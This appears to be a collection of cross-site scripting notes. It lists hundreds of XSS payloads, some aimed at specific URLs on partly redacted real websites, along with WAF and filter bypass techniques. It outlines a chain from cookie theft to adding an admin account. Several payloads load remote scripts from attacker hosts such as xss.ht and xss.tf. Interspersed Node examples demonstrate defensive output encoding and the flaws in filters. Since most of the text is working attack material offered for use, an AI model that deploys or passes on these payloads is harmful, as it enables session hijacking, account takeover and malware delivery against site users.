XSS
html-xss-payload
medium/bugbountywriteup/a-html-injection-worth-600-dollars-5f065be0ab49
DOM XSS in HTML rich-text editors
github/filedescriptor/untrusted-types
utube/watch?v=Y1S5s3FmFsI
Stored XSS, Cloudflare WAF bypass (June 2020):
"><video><source onerror=eval(atob(this.id)) id=dmFyIGE9ZG9jdW1lbnQuY3JlYXRlRWxlbWVudCgic2NyaXB0Iik7YS5zcmM9Imh0dHBzOi8vYXlkaW5ueXVudXMueHNzLmh0Ijtkb2N1bWVudC5ib2R5LmFwcGVuZENoaWxkKGEpOw==>
(the id is base64 for: var a=document.createElement("script");a.src="https://aydinnyunus.xss.ht";document.body.appendChild(a);)
F5 BIG-IP Advanced WAF XSS bypass (May 2020)
%22%3e%3c%5K/onwheel=alert(1)%3emouse%20wheel%20here%3c%21--
Stored - payload - 2020/05/17
javas cript:alert(1)
x onerror=s=createElement('script');body.appendChild(s);s.src='XSSURL';  # in the image-link field
Classification
Reflected, stored, DOM-based, XSF (Flash XSS), PDF XSS, MHTML-protocol cross-site (MHTML, data: URLs), character-encoding tricks (UTF-7 XSS)
Rich-text editor test - input box
<img SRC="www.baidu/" STYLE="xxx:expressio/*\0*/n(if(!window.x){alert('xss');window.x=1;})" ALT="111" />  # STYLE attribute insufficiently filtered; IE6 only (CSS expression())
<img src=1 alt="hello,xss"onerror=alert(1);//">  # in the post/journal field
Reflected
(1)<script>alert(1)</script>
(2)%22%3E%3Cscript%3Ealert%28/insight/%29%3C/script%3E
(3)">%3Cscript%3Ealert%kie/%29%3C/script%3E
(4)%3Cscript%3Ealert%28%27s%27%29;%3C/script%3E
(5)</SCRIPT><SCRIPT>alert("B0mbErM@n");</SCRIPT>
(6)--"><SCRIPT>alert("B0mbErM@n");</SCRIPT>  -- appended after the path
(7)xx.xx/front/register.jsp?lang="onerror=kie)%20"
Stored
</a>javascript:alert(/x/)  # e.g. the album-name field
<iframe/src=javascript:kie);>  # e.g. after uploading a video, insert into the video-description field (payload truncated in source)
XSS -> steal the user's cookie -> log into the site's admin backend -> add an admin account through a privilege-escalation bug
Test browsers: IE8 | IE9 and Opera with the XSS filter disabled | Firefox 17.0.5
DOM XSS
Blind XSS (no reflection) - Burp Collaborator
<script src="collaborator-generated random URL"></script>
XSS:
movie.x/type,area/a"><BODY ONLOAD=alert(188)>,1/
movie.x/type,area/a%22%3E%3CBODY%20ONLOAD=alert%28188%29%3E,1/
t.x/pub/tags/"><script>alert(1)</script>
t.x/pub/tags/%2522%253E%253Cscript%253Ealert(1)%253C%252Fscript%253E
t.x/tag/');alert(1)<!--
123.x/dianping/?aaaaaaaaaa"><script>alert(/wooyun/)</script>
t.x/p/worldcup?g=1"><script>alert(document.domain)</script>
shaft.jebe.x/show?a=a<script>alert(1)</script>&r=&type=single
help.x/mutually_help_null.shtml?query=<script>alert(1)</script>
www.x/Product/SearchNew.aspx?new=1&k=aaa<script>alert('xss')</script>
t.x/p/city?s=44&c=3"><script>alert(1)</script><"
search.x/bk.jsp?title="><script>alert(1)</script><"
wap.x/sogou/go2map/?pg=GMINDEX&position="><script>alert(1)</script><"
**.**.**.**/api/db/dbbak.php?apptype=1%22%3E%3Cscript%3Ealert(1)%3C/script%3E%3C%22
product.x/simp_search.php?manuid=0&keyword=</script><script>alert(42)</script>&bgcolor=ffffff
play.x/list.php?keyword=<script>alert('xss');</script>&keywords=title&x=10&y=10
login.x/hd/signin.php?act=1&reference='"><script>alert("xss");</script><"&entry=sso&reg_entry=space
www.x/websnapshot?url='"><script>alert("我又来了—小黑");</script><"&did=093e5e25b67f3688-24a8d6236dd
passport.x/matrix/getMyCardAction.do?url='"><script>alert(9122430);</script><"&chenmi=0&macval=&hmac=
mail.x/?userid=&appid='"><script>alert(15551700);</script><"&ru=
toolbox.x/searchcode/iframe?style=4&domain='"><script>alert(15551700);</script><"
www.x/pharmacysystem.php?page="><script>alert(15551700);</script>&Proceed_=1
v/astd_register.php?preurl=game.pps.tv/astd_register.php&cf="><script>alert(15551700);</script>
movies.x/movie_search.php?type=xss';"<script>alert(188)</script>&keyword=1
movies.x/movie_search.php?type=xss%27;%22%3Cscript%3Ealert%28188%29%3C/script%3E&keyword=1
movies.x/movie_search.php?type=search&keyword=</title><script>alert(/anyunix/)</script>
movies.x/movie_search.php?type=search&keyword=%3C/title%3E%3Cscript%3Ealert%28/anyunix/%29%3C/script%3E
passport.x/web/updateInfo.action?modifyType=';alert(/aa/);a='
passport.x/web/updateInfo.action?modifyType=%27;alert%28/aa/%29;a=%27
www.x/rp/uiserver2.asp?action=<script>alert(/xss/)</script>
cang.x/do/add?it=&iu=!--></script><script>alert(/xss/)</script>
cang.x/do/add?it=&iu=<script>alert(/xss/);</script>
**.**.**.**/diannao/?类型=&query=<script>alert(/xss/);</script>&cater=diannao
x.tv/cookie.php?act=login_tmp&success_callback="><div%20style="xss:expression(window.x?0:
(eval(String.fromCharCode(97,108,101,114,116,40,39,120,115,115,39,41)),window.x=1));"></div>
x/api/get_from_data.php?sid=48302&jsoncallback=jsonp1282643851243'<script>alert('s')</script>s&_=1282643881152
iu/index.php?do=Phone.List&fid=1&t=8<script>alert('s');</script>
x.sina/list.php?client=13&clientname=<script>alert('s');</script>
bj.x/bjhcg/stock/friendkchz.asp?tp=10&group="></iframe><script>alert(/XSS/);</script>
hk.x/gtja_Report/Report/Search.aspx?type="></iframe><script>alert(/XSS/);</script>
hksrv1.x/kf.php?keyword=&arg=gtjahk&style=1\0\"\'><ScRiPt>alert(/XSS/);</ScRiPt>
hk2.x/english/gtja_Report/Report/MarketCVList.aspx?type=0&key="
8.show.x/room/space.php?sid=1000040123&tab=2';</script><script>alert('by pandora ');</script><script>
passport.x/fastreg/regs1.jsp?style=black"></iframe><script>alert("pow78781");</script>
cgi.video.x/v1/user/userinfo?u=611991217;alert(/ss/)
t.x/session?username="><script>alert("xss")</script>\&password=xss&savelogin=1234
v.x/result.html?word=asdf<img src=1 onerror=alert(1)>&submit=百度一下&type=0
b2b.x/search/search.jsp?shangji=3&query=<script>kie)</script>
login.x/sso/login.php?callback=alert(String.fromCharCode(120,115,115,101,114));//&returntype=IFRAME
t.x/ajaxlogin.php?framelogin=1&callback=var aa='&retcode=101';alert('xsser');var bb='({&reason=';<!--
sms.x/GGBJ/login.php?phone=sefrefwe" /><script>alert(/ss/);</script><!--
tuan.x/beijing/life/?promoteid='"><script>alert(565902);</script><"
chat.x/robot/repositoryBrowse.jsp?title=</TITLE><body onload=alert(999)>
cp.x/login.asp?language='"><script>alert(7001645);</script><"
hi.x/?origURL='"><script>alert(123);</script><"&loginregFrom=index&ss=10101
auth.x/login/index.htm?support=&CtrlVersion=&loginScene=&personalLoginError=&goto='"><script>alert(7263974);</script><"&password=&REMOTE_PCID_NAME=_seaside_gogo_pcid&_seaside_gogo_pcid=&_seaside_gogo_=&_s
v/astd_register.php?preurl=game.pps.tv/astd_register.php&cf="><script>alert(9631676);</script>
reg.x/xn6205.do?ss=a&rt=a&g=');location='baidu';//
Rich-text editor image upload: intercept the POST request:
msg=分享图片&act=insertTwitter&pic=up2.upload.x/"abc/123/onerror=alert(); xxx.png
msg=%u5206%u4EAB%u56FE%u7247&act=insertTwitter&pic=up2.upload.x/"abc/123/onerror=alert(); xxx.png
Rich text - submitted in source-code edit mode, STYLE tag not filtered - IE6, 7, 8
<img SRC="www.x/" STYLE="xxx:expressio/*\0*/n(if(!window.x){alert('xss');window.x=1;})" ALT="111" />
Rich-text editor, post field:
<img src=1 alt="hello,xss"onerror=alert(1);//">
Text box:
<script>alert(/1/)</script>
<script>alert(/xss/)</script>
<script>alert("XSS")</script>
</style><script>alert(/xss/)</script>
<script>alert(1)</script>
"><script>alert(/a/);</script>
<script>kie)</script>  -- e.g. insert into the forum signature -> post in the forum -> popup (payload truncated in source)
</script><script>alert(1)</script>
WooYun<img src='' onerror=alert(/poc/)>
'"><script>alert(111);</script><"
<img src="x" onerror="alert(1)">
anyunix"/></div></div></div><BODY ONLOAD=alert('anyunix')>
"><script>alert(1)</script><"    -- Tieba post/reply title field
>><<script>alert(/xss/)</script><
Create a new album and put "><script>alert(1)</script><" in the name and description fields -> fires whenever the album is edited later
-- article title field
<script>alert('s')</script>
<script>alert(/xss/)</script>
'"><script>alert("url");</script><"  -- insert-link text box
anyunix</textarea></div></div><BODY ONLOAD=alert('anyunix')></textarea>  -- signature field
The personal space's "modify style" feature only runs a JavaScript check before saving and never filters the submitted content on the server, giving persistent XSS. (expression(alert(1)) works in IE6 and IE8; the field has a length limit.)
'"><script>alert("pow78781");</script>  --- username field at registration
"><script src="www.***/test.js" type="text/javascript"></script>
JavaScript can be executed on the personal blog home page
Details:
When a custom template is used, inserted JavaScript is not checked or filtered at all. A plain location.href redirect is enough to hide the posts, comments, etc. of any visitor's own blog (when the visitor is logged in).
Proof of concept:
Edit the custom code (e.g. the head area) and insert
<script>www.x/user/service.php?op=poststatus&blogid=***&id=***&Status=0</script>
Personal-space DIY accepts CSS expression(); tested in IE6 and IE7
The full-width-character form of expression is not filtered, and IE6 still parses and executes it, so users reading Sohu mail in IE 6.0 can be hit; e.g. insert this text in the mailbox:
<DIV STYLE="width: expression(alert('XSS'));">
Mail - sender name
fill in </script><script>alert()</script>
Mail - outbox message body - STYLE tag not filtered:
<STYLE>@im\port'\ja\vasc\ript:alert("XSS")';</STYLE>
Mail body:
<div >xsser</div>
1. From QQ mailbox A, send a mail to QQ mailbox B. After filling in the recipient and subject, use the editor's built-in insert-image feature to insert a "web image" (any address will do, even asdf); then, right after the inserted image in the editor, type arbitrary HTML.
2. When B opens the mail and clicks reply, the popup fires.
Image upload:
<img src="javascript:alert(/xxxs/)">  -- IE6 only
Image name (use the JS for CSRF):
<script src=1.js></script>
<script src=***/*.js>
Insert JS into the image -> upload -> display:
<img src="" onerror="XSS" />
Insert JS into an attachment -> upload -> display:
<style> body{ width:expression(alert(/xss/)) } </style>
Search field:
<script>alert(/xxx/)</script>
"><script>alert()</script>
"><script>alert(/新浪手机跨站/)</script><
"><iframe src=www.baidu></iframe>
'"><script>alert("小黑来跨站");</script><"
<iframe src=www.baidu </iframe>
<iframe src=www.baidu width=500 height=90></iframe>
aa</title></head><script>alert('乖乖');</script>
" onFocus="alert('十九楼跨站')
External imports:
CSS import:
@import url(**.**.**.**/1.css);  pulls in a remote CSS file; the XSS payload goes in 1.css.
$str = preg_replace($filter, '', $str); // the filter does run, but its result is only used for the check below; the original input is stored unchanged
if(preg_match("/(expression|implode|javascript)/i", $str)) {  // no check for import, http, etc.
/(expression|vbscript|javascript|import)/i  tested in IE6, IE7, IE8.
JS file import:
/classic/rdMail.php?cb=1,</script><script src="XX/s.js"></script><script>
t.x/ajaxlogin.php?framelogin=1&callback=document.all[3].src='xss/xss.js';</script><!--
123.x/dianping/?"><SCRIPT/*/SRC='/xss.js'>
Triggered on page redirect:
The server-side filtering of the parameter is lax, so a URL carrying JavaScript can be submitted in the parameter; the payload fires when the page redirects (e.g. going from the search page to the skin chooser).
www.x/search?q=beyond&"><script>alert('ok')</script>
Trigger:
www.x/skinchooser?back_url=www.x/search?q=beyond&"><script>alert('ok')</script>
Flash XSS
swf:
</script><!--><meta http-equiv="refresh" content="3;url=le.hk"><!--www.1.swf-->.swf  (entered in the link-address field)
Link address:
mp3 link (entered in the link-address field):
gHK【DBA】--><script language="javascript" type="text/javascript" src="js.users.51.la/4209140.js"></script><!--跨站.mp3
Importing a JS file through the URL/link-address field:
'<!--><script language="javascript" type="text/javascript" src="js.users.51.la/4209140.js"></script><!--
Bypassing length limits:
(1) POST form submission:
</title><script>alert(/1/)</script>
Redirect without using ' or " characters -> automatically jumps to www.hao123
/v1/user/userinfo?u=611991217;var str=window.location.href;var es=/url=/;es.exec(str);var right=RegExp.rightContext;window.location.href=right&url=www.hao123
Impact:
(1) Automatic page redirect / refresh
h.x/download/search.php?f_name=0;URL=visioncn/news" http-equiv="refresh" \\\
(2) Reading sensitive data
XSS on the same origin as the webmail: lure the user into clicking inside a mail, then read the mail list, address book, etc.
(3) POST via Ajax to change profile data, e.g. set the account e-mail to one the attacker controls, then reset the password and take over the account
(4) Obtaining the admin account (the admin views the stored script in the backend)
(5) Phishing
(6) Worms
Conditions: 1. same origin  2. the victim is logged in
Defence:
PHP: htmlspecialchars($s, ENT_QUOTES, 'UTF-8') on output. This covers the HTML-body and quoted-attribute contexts only; unquoted attributes, URL attributes (javascript:) and JavaScript string contexts need their own encoding or validation.
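As an added example (not from these notes) of why htmlspecialchars alone is not enough, the Node script below applies an ENT_QUOTES-equivalent encoder in four output contexts and checks the result with payloads taken from this page. It also shows the fix for the two contexts the encoder does not cover: always quote attribute values, and allow-list the URL scheme before writing an href. isSafeHref uses the WHATWG URL parser (Node's global URL), which strips leading spaces and embedded tabs/newlines the way browsers do, so the javas<tab>cript: variants listed elsewhere on this page are caught. All function names, the base URL and the allowed-scheme list are mine.

```javascript
// Added example, not from the original notes: contextual output encoding.
// escapeHtml() is the JavaScript equivalent of PHP htmlspecialchars($s, ENT_QUOTES).
const HTML_ESCAPES = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#039;' };

function escapeHtml(value) {
  return String(value).replace(/[&<>"']/g, (c) => HTML_ESCAPES[c]);
}

// Context 1: HTML body. Encoding is sufficient; the payload becomes text.
function renderBody(value) {
  return `<div>${escapeHtml(value)}</div>`;
}

// Context 2: quoted attribute. Sufficient, because the only way out of the
// value is the quote character, and that is encoded.
function renderQuotedAttr(value) {
  return `<input value="${escapeHtml(value)}">`;
}

// Context 3 (bug): unquoted attribute. A space ends the value and spaces are
// not encoded, so the attacker appends attributes of their own.
function renderUnquotedAttr(value) {
  return `<input value=${escapeHtml(value)}>`;
}

// Context 4: URL attribute. "javascript:" contains none of the five encoded
// characters, so encoding does nothing; the scheme has to be allow-listed.
// Hypothetical base URL: relative links resolve against it and are allowed.
const ALLOWED_SCHEMES = new Set(['http:', 'https:', 'mailto:']);
function isSafeHref(value) {
  try {
    // The WHATWG parser lowercases the scheme and removes tabs, newlines and
    // leading/trailing whitespace, so an obfuscated "java\tscript:" is normalized.
    const url = new URL(String(value), 'https://example.invalid/');
    return ALLOWED_SCHEMES.has(url.protocol);
  } catch (e) {
    return false;
  }
}
function renderHref(value) {
  const href = isSafeHref(value) ? value : 'about:blank';
  return `<a href="${escapeHtml(href)}">link</a>`;
}

// Constructed inputs, each taken from a payload in these notes (the unquoted
// one is the input-field payload with its surrounding quotes removed, which is
// exactly what an unquoted attribute needs).
const PAYLOADS = {
  body: '<script>alert(1)</script>',
  quotedAttr: '"><script>alert(1)</script><"',
  unquotedAttr: '1 autofocus onfocus=alert(1) x=',
  href: 'javascript:alert(1)',
  hrefObfuscated: ' JaVa\tScRiPt:alert(1)',
};
```

renderUnquotedAttr() returns `<input value=1 autofocus onfocus=alert(1) x=>` for the third payload even though every character went through the encoder; the fix is renderQuotedAttr(), i.e. never emit an unquoted attribute. renderHref() rejects both the plain and the whitespace-obfuscated javascript: URL and keeps ordinary http(s) and relative links.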
Common construction methods
<sCript>alert(1)</scRipt>    # the filter's regex is incomplete or it never normalizes case
<script>alert(/xss/)</script> # mostly used in the address bar
%253Cimg%2520src%253D1%2520onerror%253Dalert%25281%2529%253E  # double URL-encoding bypass (the filter sees %3Cimg..., the application decodes once more)
<script>eval(String.fromCharCode(97, 108, 101, 114, 116, 40, 39, 120, 115, 115, 39, 41))</script>    # characters as decimal char codes
<scr<script>ipt>alalertert(1)</scr</script>ipt>  # piecing together: the WAF strips each blacklisted token in a single pass, so what is left after stripping is the real payload
"onmousemove="alert('xss')
</textarea><script>alert('xss')</script>
<img src=1 onerror=alert('xss')>      # no image named 1 exists, so onerror runs alert('xss')
<a href=javascript:alert('xss')>s</a>  # alert runs when s is clicked
<iframe src=javascript:alert('xss');height=0 width=0 /></iframe>  # popup via the iframe src
"><script>onclick=alert(1)</script>
<a href="#" onclick="alert(1)">s</a>
<script>eval(location.hash.substr(1))</script>#alert('xss')
<p>Sanitizing <img src=""INVALID-IMAGE" onerror='location.href="too.much.spam/"'>!</p>
"<svg/onload=confirm(document.domain)>
a"><svg/onload=prompt(1)>
"></iframe><script>alert('OPEN BUG BOUNTY');</script>
<button onfocus=alert(/xss/) autofocus>    # autofocus fires onfocus on load; if autofocus is stripped the user has to focus the button
<img src=x onerror=window.alert(1) >
<img src=x onerror=window['al'%2B'ert'](1) >
<img src=x onerror=_=alert,_(/xss/) >
<img src=x onerror=_=alert;_(/xss/) >
<img src=x onerror=_=alert;x=1;_(/xss/) >
<body/onload=document.write(String.fromCharCode(60,115,99,114,105,112,116,62,97,108,101,114,116,40,49,41,60,47,115,99,114,105,112,116,62))>
<sCrIpt srC=xss.tf/eeW></sCRipT>
"<body/onload=document.write(String.fromCharCode(60,115,67,114,73,112,116,32,115,114,67,61,104,116,116,112,58,47,47,120,115,115,46,116,102,47,101,101,87,62,60,47,115,67,82,105,112,84,62))>"    # the script URL passed as char codes (decodes to <sCrIpt srC=http://xss.tf/eeW></sCRipT>); String.fromCharCode is available in every browser, IE included
<img src=x onerror=javascript:'.concat('alert(1)>    # caught by both IE's filter and the XSS Auditor
javascript://%250Aalert(1)    # open redirect where the server URL-decodes twice (passes validation with PHP filter_var/filter_input and FILTER_VALIDATE_URL)
javascript://%0Aalert(1)    # open redirect where the server URL-decodes once (same validation)
javascript://%0A1?alert(1):0    # ternary operator
javascript://baidu/%0A1?alert(1):0    # ternary operator
12345678901<svg onload=alert(1)>    # fixed-length field: pad with filler characters
<script%20src%3D"http%3A%2F%2F0300.0250.0000.0001"><%2Fscript> # dotted-octal IP address (0300.0250.0000.0001 = 192.168.0.1)
<img src="1" onerror=eval("\x61\x6c\x65\x72\x74\x28\x27\x78\x73\x73\x27\x29")></img>  # characters as hex escapes
<svg onload=javascript:alert(1) xmlns="st">
<iframe src="java script:alert(1)" height=0 width=0 /><iframe> # WebKit filter-rule bypass
<script>alert('xss')</script>
" onclick="alert('xss')
<script src="xss8.pw/bgFfBx?1419229565"></script> (loads an external JS file)<script>confirm(/v587/)</script>
'"()&%<acx><ScRiPt>alert(/xss/)</ScRiPt>
'";alert(1);//
'";alert(/xsss/)//
zaq'onmouseover=prompt(1)>
<svg/onload=alert(1)>
/index.jsp?vendor_id=";alert(/xss/)<!--
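The case, piecing-together and double-URL-encoding entries in the list above all beat the same kind of filter. As an added example that is not part of the original notes, the Node script below builds that filter (a single-pass, case-sensitive token blacklist), a hardened fix-point variant, and a two-stage decode pipeline, then runs the three payloads through them. The token list, the pipeline and the names are mine; the payload strings are the ones from the list.

```javascript
// Added example, not from the original notes: the case, nesting and
// double-encoding bypasses run against a blacklist filter of the kind the
// notes describe. All names are mine.

// Tokens a naive WAF might strip. "onerror=" and "<img" include the delimiter
// so that the URL-encoded forms (onerror%3D, %3Cimg) do not match.
const BLACKLIST = ['<script>', '</script>', '<img', 'onerror=', 'javascript:'];

// Single pass, case-sensitive: each token is removed once, in order.
function naiveFilter(input) {
  let out = input;
  for (const token of BLACKLIST) out = out.split(token).join('');
  return out;
}

function escapeRegex(s) {
  return s.replace(/[.*+?^${}()|[\]\\]/g, '\\$&');
}

// Case-insensitive and repeated until nothing changes. This defeats the case
// and nesting bypasses but, as pipeline() shows, not the encoding one.
function fixpointFilter(input) {
  let prev;
  let out = input;
  do {
    prev = out;
    for (const token of BLACKLIST) {
      out = out.replace(new RegExp(escapeRegex(token), 'gi'), '');
    }
  } while (out !== prev);
  return out;
}

// Simulated request path for the double-encoding bypass: the front end (or the
// web server) decodes the query string once, the filter inspects that, and the
// application decodes the stored value a second time before rendering.
function pipeline(rawQueryValue, filter) {
  const seenByFilter = decodeURIComponent(rawQueryValue);
  const afterFilter = filter(seenByFilter);
  return decodeURIComponent(afterFilter);
}

// Constructed inputs, each matching a payload in the list above.
const CASE_BYPASS = '<sCript>alert(1)</scRipt>';
const NESTED_BYPASS = '<scr<script>ipt>alert(1)</scr</script>ipt>';
const DOUBLE_ENCODED = '%253Cimg%2520src%253D1%2520onerror%253Dalert%25281%2529%253E';
const SINGLE_ENCODED = '%3Cimg%20src%3Dx%20onerror%3Dalert(1)%3E';
```

naiveFilter() leaves the mixed-case tag untouched and turns the nested payload into a clean `<script>alert(1)</script>`; fixpointFilter() reduces both to `alert(1)`. The double-encoded payload survives both filters, because at the moment of inspection it contains only `%3Cimg` and `onerror%3D`, and only the application's second decode produces `<img src=1 onerror=alert(1)>`. Filtering before the last decode is the defect; encoding at output time (previous section) does not have it.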
Character-restriction bypass methods
1" autofocus onfocus=alert(1) x="  # no angle brackets needed / inside an input tag
name=javascript:alert(1) autofocus onfocus=location=this.name  # no angle brackets needed / inside an input tag
location=<URL-encoded payload> lets the parentheses be written as %28 %29  # () bypass
passing the value through this.name  # single-quote bypass
<SCRIPT>a=/1/
alert(a.source)</SCRIPT>  # no single quote, double quote or semicolon (the line break separates the two statements) | angle brackets and = cannot be avoided
<script>{onerror=alert}throw 1</script>  # no quotes or semicolons
<script>eval(String.fromCharCode(97, 108, 101, 114, 116, 40, 39, 120, 115, 115, 39, 41))</script>  # no single quote, double quote or semicolon | angle brackets cannot be avoided
<<SCRIPT>a=/1/
alert(a.source)//<</SCRIPT>  # survives <script> stripping, no quotes or semicolons | = cannot be avoided
<a href="javascript:alert('xss')">link</a>  # javascript: scheme in href
<img src="1" onerror=eval("\x61\x6c\x65\x72\x74\x28\x27\x78\x73\x73\x27\x29")></img>  # no literal alert
Constructions that get past IE's XSS filter but not the XSS Auditor (Chrome removed the XSS Auditor in Chrome 78, so the "Auditor" results below describe older Chrome only)
<img src=1 onerror=alert(document.domain)>
<video src=1 onerror=alert(/xss/)>
<audio src=x onerror=alert(/xss/)>
<body/onfocus=alert(/xss/)>
<input autofocus onfocus=alert(1)> # autofocus fires onfocus on load; only the first autofocus element on the page gets it, otherwise the user has to focus the field
<svg onload=location=alert(1)>
<svg onload=javascript:alert(1)>
<button onfocus=prompt(1) autofocus> # same autofocus caveat
<select autofocus onfocus=prompt(1)> # same autofocus caveat
"<svg/onload=alert(1)>"@x.y  XSS in an e-mail address field that is only checked with if(!filter_var($email, FILTER_VALIDATE_EMAIL))
<script>alert('xss')</script><svg/onload=setTimeout(alert(1))><img src=1 structor(alert(1))>  (third payload garbled in source)
<img src=1 onerror=[1].map(alert)>
<img src=1 onerror=[1].filter(alert)>
<img src=1 onerror=alert(document.domain)>
<svg/onload=setTimeout(String.fromCharCode(97,108,101,114,116,40,49,41))>
<body/onload=document.write(String.fromCharCode(60,115,99,114,105,112,116,62,97,108,101,114>  # <script>alert(1)</script> as char codes (truncated in source)
<body/onfocus=_=alert,_(123)>
Using <details>: supported only by Chrome, Safari 6+ and Opera 15+ at the time of these notes | does not get past Chrome's XSS Auditor | when eval is blocked, pass alert(1) in octal
<details open ontoggle=top.alert(1)>
<details open ontoggle=top['alert'](1)>
<details open ontoggle=top['prompt'](1)>
<details open ontoggle=top['al'%2b'ert'](1)>
<details open ontoggle=top.eval('ale'%2B'rt(1)') >
<details open ontoggle=eval('alert(1)') >
<details open ontoggle=eval('\u0061\u006c\u0065\u0072\u0074\u0028\u0031\u0029') >
<details open ontoggle=eval(atob('YWxlcnQoMSk=')) >
<details open ontoggle=\u0065val(atob('YWxlcnQoMSk=')) >
<details open ontoggle=%65%76%61%6c(atob('YWxlcnQoMSk=')) >
<details open ontoggle=eval('%61%6c%65%72%74%28%31%29') >
<details open ontoggle=eval('\141\154\145\162\164\50\61\51') >
<details open ontoggle=eval(String.fromCharCode(97,108,101,114,116,40,49,41)) >
# External URL: create and insert a script node with DOM methods to load an external JS file; the handler body can be URL-encoded
<details open ontoggle=eval("appendChild(createElement('script')).src='xss.tf/eeW'")>
<details open ontoggle=eval(%61%70%70%65%6e%64%43%68%69%6c%64%28%63%72%65%61%74%65%45%6c%65%6d%65%6e%74%28%27%73%63%72%69%70%74%27%29%29%2e%73%72%63%3d%27%68%74%74  (the previous line URL-encoded; truncated in source)
Detection-rule / WAF bypass methods
Client-side bypass - the "WAF" is client-side JavaScript; tamper with the request in Burp or Fiddler
User-Agent spoofing - for sites that do not filter requests whose User-Agent looks like the Baidu, Google, Soso or 360 crawler
Cookie bypass - $_REQUEST reads GET, POST and COOKIE, but the WAF only inspects GET and POST
IP/proxy bypass - when the site displays the client IP or browser, both can be forged; in PHP the X-Forwarded-For and Client-IP request headers ($_SERVER['HTTP_X_FORWARDED_FOR'], $_SERVER['HTTP_CLIENT_IP']) that code reads for the "client IP" are attacker-supplied
Browser-plugin bypass - bypasses arbitrary WAFs / supports cross-domain
Encoding bypass - HTML, Unicode, URL, ASCII, JS encoding, base64
Character-entity bypass
WebKit filter-rule bypass
Parameter-pollution bypass (mainly for search engines)
127.0.0.1:631/admin/?kerberos=onmouseover=alert(1)&kerberos
Comment-delimiter bypass (the payload is split across two inputs)
input1#value: "><!--
input2#value: --><script>alert(/xss/);<script/>
External CSS import bypass
Server-side language-specific bypass
Code-logic bypass
Language/framework bugs - e.g. jQuery's html() method - Apache/Nginx access-log attack  a/test/?text=<script>alert(1)</script>  # Nginx in front, Apache behind
External CSS import, full example
<!DOCTYPE HTML>
<html>
<head>
<style>
@import url("malicious.css");
</style>
<title>TEST</title>
<meta charset="utf-8">
</head>
<body >
There is a will!
</body>
</html>
malicious.css (CSS expression() only runs in old IE):
body{
color:expression(alert('xss'));
}
Mobile constructions
# ontouch* handlers
<body ontouchstart=alert(45)>
<body ontouchend=alert(45)>
<body ontouchmove=alert(45)>
Cookie-based injection
Add to the Cookie header:
style: wrewrwrwrwrafas"><script>alert(1)</script><!--
Code-logic bypass
Payload (%0a, %0d, %09 and comments can replace spaces to dodge pattern matching):
');%0a}%0d}%09alert();/*anything here*/if(true){//anything here%0a(' ');}}alert();if(true){('
Scenario: the value lands inside a string literal in a server-generated script. The payload closes the blocks that are open at the injection point, runs alert() outside them, then opens if(true){ so that the template's remaining } else { ... } } still parses.
function example(age, subscription){
if (subscription){
if (age > 18){
another_function('');}}alert();if(true){('');
}
else{
console.log('Requirements not met.');
}
}
What the engine executes ->
function example(age, subscription){
if (subscription){
if (age > 18){
another_function('');
}
}
alert();
if (true){
('');
}
else{
console.log('Requirements not met.');
}
}
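The brace-balancing trick above, as an added example that is not part of the original notes: a Node script renders the notes' example() template around an injected value, compiles it, and reports whether alert() ran and what another_function() received. The template here puts the else on the outer if, so the notes' payload needs one extra '{' to reopen two blocks; the point is that the payload's closing braces must mirror the blocks open at the injection point and its opening braces must match what the template closes afterwards. jsLiteral() is the fix: emit the value as a JSON string literal with '<' escaped. Function and constant names are mine.

```javascript
// Added example, not from the original notes: the brace-balancing injection
// reproduced in Node so the outcome can be checked rather than eyeballed.
// renderScript() is the notes' example() template; `lit` is whatever the
// server writes into the another_function() call.
function renderScript(lit) {
  return `function example(age, subscription){
  if (subscription){
    if (age > 18){
      another_function(${lit});
    }
  }
  else{
    console.log('Requirements not met.');
  }
}`;
}

// The vulnerable emitter: wrap the raw value in single quotes.
function unsafeLiteral(value) {
  return "'" + value + "'";
}

// The safe emitter: JSON.stringify yields a valid JS string literal; '<' is
// escaped so a value containing </script> cannot end the script block, and
// U+2028/U+2029 are escaped because older engines treat them as line terminators.
function jsLiteral(value) {
  return JSON.stringify(String(value))
    .replace(/</g, '\\u003c')
    .replace(/\u2028/g, '\\u2028')
    .replace(/\u2029/g, '\\u2029');
}

// Compile the rendered script with stubbed globals, call example(), and report
// whether alert() ran and what another_function() received. Returns null when
// the rendered source does not parse (the injection left braces unbalanced).
function runExample(lit, age, subscription) {
  let alerted = false;
  let received;
  let compiled;
  try {
    compiled = new Function('alert', 'another_function', 'console',
      renderScript(lit) + '\nreturn example;');
  } catch (e) {
    return null;
  }
  const example = compiled(
    () => { alerted = true; },
    (v) => { received = v; },
    { log: () => {} },
  );
  example(age, subscription);
  return { alerted, received };
}

// Naive breakout: valid JS, but alert() is still inside both if blocks.
const NAIVE = "');alert();('";
// Brace-balancing payload from the notes, with one extra '{' because in this
// template the else belongs to the outer if: close both ifs, run alert()
// unconditionally, then reopen two blocks so the template's remaining
// '} } else { ... } }' still parses.
const BALANCED = "');}}alert();if(true){{('";
// The notes' payload as written (one '{'): unbalanced against this template.
const UNBALANCED = "');}alert();('";
```

With unsafeLiteral(), NAIVE only fires when subscription is truthy and age > 18, BALANCED fires on every call, and UNBALANCED does not even compile. With jsLiteral(), BALANCED reaches another_function() as an ordinary string and alert() never runs.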
Tools
XSpear
Exploitation
Injecting malicious code - tool - Guilin Laobing (桂林老兵) cookie-spoofing tool
<img src=x onerror=appendChild(createElement('script')).src='js_url' />
Third-party hijacking (externally loaded JS/CSS)
XSS downloader
XCS
Page-rendering XSS
Cryptomining
DDoS
Internal-network IP/port scanning and live-host discovery
Screenshots
Finding the admin backend URL
Drive-by download (挂马)
waf
"
<
(